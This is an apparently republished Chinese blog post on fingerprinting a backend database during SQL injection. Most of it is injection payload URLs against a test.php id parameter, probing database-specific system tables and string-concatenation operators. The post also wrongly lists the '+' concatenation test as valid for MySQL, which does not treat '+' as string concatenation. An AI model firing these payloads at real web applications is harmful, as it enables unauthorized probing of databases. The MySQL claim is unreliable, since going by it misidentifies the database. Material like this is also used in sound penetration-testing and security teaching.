温馨提示×

温馨提示×

您好,登录后才能下订单哦!

密码登录×
登录注册×
其他方式登录
点击 登录注册 即表示同意《亿速云用户服务条款》

sql注入过程中后台数据库类型的三种判断方式

发布时间:2020-06-24 22:37:28 来源:网络 阅读:3715 作者:白乌鸦_ 栏目:数据库

后台数据库类型判断:

一、通过页面返回的报错信息,一般情况下页面报错会显示是什么数据库类型,在此不多说;

二、通过各个数据库特有的数据表来判断:

    1、mssql数据库

      http://127.0.0.1/test.php?id=1 and (select count(*) from sysobjects)>0 and 1=1

    2、access数据库

      http://127.0.0.1/test.php?id=1 and (select count(*) from msysobjects)>0 and 1=1

    3、mysql数据库(mysql版本在5.0以上)

      http://127.0.0.1/test.php?id=1 and (select count(*) from information_schema.TABLES)>0 and 1=1

    4、oracle数据库

      http://127.0.0.1/test.php?id=1 and (select count(*) from sys.user_tables)>0 and 1=1

三、通过各数据库特有的连接符判断数据库类型:

    1、mssql数据库

     http://127.0.0.1/test.php?id=1 and '1' + '1' = '11'

    2、mysql数据库

     http://127.0.0.1/test.php?id=1 and '1' + '1' = '11'

     http://127.0.0.1/test.php?id=1 and CONCAT('1','1')='11'

    3、oracle数据库

     http://127.0.0.1/test.php?id=1 and '1'||'1'='11'

     http://127.0.0.1/test.php?id=1 and CONCAT('1','1')='11'

向AI问一下细节

免责声明:本站发布的内容(图片、视频和文字)以原创、转载和分享为主,文章观点不代表本网站立场,如果涉及侵权请联系站长邮箱:is@yisu.com进行举报,并提供相关证据,一经查实,将立刻删除涉嫌侵权内容。

AI